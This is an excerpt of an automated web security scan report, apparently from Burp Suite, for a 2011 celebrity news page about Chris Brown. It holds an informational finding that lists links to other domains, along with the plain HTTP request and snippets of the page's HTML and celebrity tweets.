<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Lol RT <a href="http://twitter.com/AshNHartz">@AshNHartz</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> Are you & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716672863731714">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: I was 3 months in this pic RT <a href="http://twitter.com/Please_Stand_By">@Please_Stand_By</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> This is you recently pregnant? <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716118221561856">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31716032452231168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712954776821760">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Opening for a Huge mega star! I'm beyond excited! RT <a href="http://twitter.com/iutrav">@iutrav</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712647732797440">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Ur a doll! RT <a href="http://twitter.com/JoshGottlieb">@JoshGottlieb</a>: Fun day! Thank you <a href="http://twitter.com/BrielleZolciak">@BrielleZolciak</a>, <a href="http://twitter.com/arianazolciak">@arianazolciak</a> <a href="http://twitter.com/biermann71">@biermann71</a> and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712300427644928">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/AtlantaPlaces">@AtlantaPlaces</a>: Club Life is buzzing again: <a href="http://sch.mp/0jHde">http://sch.mp/0jHde</a> - RT <a href="http://twitter.com/KingLj11">@KingLj11</a> Me and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> @ club Life!! <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31711564050472961">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: On plane wish i could call in!RT <a href="http://twitter.com/lxnewyork">@lxnewyork</a> Getting ready to chat with our favorite sunday morning show <a href="http://twitter.com/lxtvopenho">@lxtvopenho</a>... <a href="http://tl.gd/8g30qb">http://tl.gd/8g30qb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705598416392194">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: So happy. Flying <a href="http://twitter.com/continental">@continental</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705092302315520">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/Banshee_Song">@Banshee_Song</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31690324585742336">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/buddyhead">@buddyhead</a> <a href="http://youtu.be/fX_120DMFDQ">http://youtu.be/fX_120DMFDQ</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31688081048342528">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/ipierce89">@ipierce89</a> Oh no! Yur not DRIVING <a href="http://twitter.com/OMGitsjessielee">@OMGitsjessielee</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31674584327528449">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31672009905672192">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31671556916645888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/44221_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rzrachelzoe">rzrachelzoe</a>: RT <a href="http://twitter.com/prabalgurung">@prabalgurung</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rzrachelzoe/statuses/31667825831579649">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.362. http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/music/chris-brown-completes-domestic-violence-program-1594072.story

Issue detail

The page was loaded from a URL containing a query string:

http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story?GT1=28135

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://bit.ly/e3toNb
http://del.icio.us/post?title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story
http://digg.com/submit?phase=2title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://microsoft.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx
http://platform.twitter.com/widgets.js
http://reddit.com/submit?title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story
http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css
http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css
http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css
http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif
http://static.wonderwall.com/photos/Module1x1/1226_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15124_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15298_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/18487_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg
http://static.wonderwall.com/photos/Module1x1/41220_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/41323_Module1x1_634261162153428902.jpg
http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7877_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7895_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg
http://static.wonderwall.com/photos/Original/41220_Original.jpg
http://tl.gd/8fkbn3
http://twitpic.com/3kde2c
http://twitpic.com/3umrxp
http://twitter.com/2RQ
http://twitter.com/AIDSPolicyProj
http://twitter.com/AubreyODay
http://twitter.com/AubreyODay/statuses/31475592251580417
http://twitter.com/AubreyODay/statuses/31478843529232385
http://twitter.com/BowWow
http://twitter.com/BowWow/statuses/31481112115019776
http://twitter.com/BrianLynch
http://twitter.com/CarlaDiBello
http://twitter.com/DJPaulyD
http://twitter.com/DJPaulyD/statuses/31480933047603200
http://twitter.com/KimKardashian
http://twitter.com/KimKardashian/statuses/31468288559030272
http://twitter.com/KimKardashian/statuses/31468574493114368
http://twitter.com/LoBosworth
http://twitter.com/LoBosworth/statuses/31474891412738048
http://twitter.com/MirandaBuzz
http://twitter.com/MirandaBuzz/statuses/31469606199623680
http://twitter.com/PaulaAbdul
http://twitter.com/PerezHilton
http://twitter.com/PerezHilton/statuses/31481637023784960
http://twitter.com/PeterGriffinn
http://twitter.com/Punch800
http://twitter.com/RicardoFenty
http://twitter.com/SarahKSilverman
http://twitter.com/SarahKSilverman/statuses/31469730384580608
http://twitter.com/StevenGParry
http://twitter.com/__shelovesB
http://twitter.com/ashleeRocs
http://twitter.com/avoyermagyan
http://twitter.com/barbara230
http://twitter.com/csiriano
http://twitter.com/csiriano/statuses/31485259056943104
http://twitter.com/dovetailchicago
http://twitter.com/emmarosekenney
http://twitter.com/emmyrossum
http://twitter.com/emmyrossum/statuses/31490256649850880
http://twitter.com/iamdiddy
http://twitter.com/iamdiddy/statuses/31469852891807744
http://twitter.com/izzy_kardashian
http://twitter.com/kurumiuchino
http://twitter.com/llcoolj
http://twitter.com/llcoolj/statuses/31477242445959168
http://twitter.com/mccordalex
http://twitter.com/mccordalex/statuses/31471195719208960
http://twitter.com/michaelianblack
http://twitter.com/michaelianblack/statuses/31488824462811136
http://twitter.com/michaelianblack/statuses/31490865776037888
http://twitter.com/racheljosephf
http://twitter.com/rainnwilson
http://twitter.com/rainnwilson/statuses/31475437494345729
http://twitter.com/rihanna
http://twitter.com/rihanna/statuses/31482886624378880
http://twitter.com/rihanna/statuses/31484086254051328
http://twitter.com/rihanna/statuses/31485881311297536
http://twitter.com/samantharonson
http://twitter.com/samantharonson/statuses/31473844573179904
http://twitter.com/samantharonson/statuses/31473906485297152
http://twitter.com/samantharonson/statuses/31474068645478400
http://twitter.com/samantharonson/statuses/31474364587180033
http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story%3Focid%3Dtwtr-utweet
http://twitter.com/traverrains
http://www.associatedpress.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=CWWWBQ
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5
http://www.bltwy.com/
http://www.delish.com/
http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3
http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story
http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Chris+Brown+completes+domestic+violence+program&u=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story
http://yfrog.com/hsi3mlfj
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js
https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /music/chris-brown-completes-domestic-violence-program-1594072.story?GT1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:52:01 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="Search.Image" content="http://static.wonderwall.com/photos/Module1x1/41220_Module1x1.jpg" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Module1x1/41220_Module1x1.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/41220_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/41220_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/38333_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/40989_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/28533_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/23689_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43555_Original.jpg" alt="/" /></span>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story%3Focid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Chris+Brown+completes+domestic+violence+program&u=http%3A%2F%2Fwonderwall.msn.com%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Reddit</a>
...[SNIP]...
<cite><a href="http://www.associatedpress.com/">The Associated Press</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>: <a href="http://twitter.com/BrianLynch">@BrianLynch</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31490865776037888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/41323_Module1x1_634261162153428902.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/emmyrossum">emmyrossum</a>: Day off today, <a href="http://twitter.com/emmarosekenney">@emmarosekenney</a> and I hit up <a href="http://twitter.com/dovetailchicago">@dovetailchicago</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/emmyrossum/statuses/31490256649850880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31488824462811136">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/__shelovesB">@__shelovesB</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31485881311297536">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15298_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/csiriano">csiriano</a>: Important! Various ticket websites are selling fake tickets to my fashion show. I wish everyone who wanted to (cont) <a href="http://tl.gd/8fkbn3">http://tl.gd/8fkbn3</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/csiriano/statuses/31485259056943104">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: #puppyNAVY ? RT <a href="http://twitter.com/RicardoFenty">@RicardoFenty</a>: #DogNavy <a href="http://twitpic.com/3kde2c">http://twitpic.com/3kde2c</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31484086254051328">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/StevenGParry">@StevenGParry</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31482886624378880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/PerezHilton">PerezHilton</a>: <a href="http://twitter.com/PaulaAbdul">@PaulaAbdul</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/PerezHilton/statuses/31481637023784960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31481112115019776">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
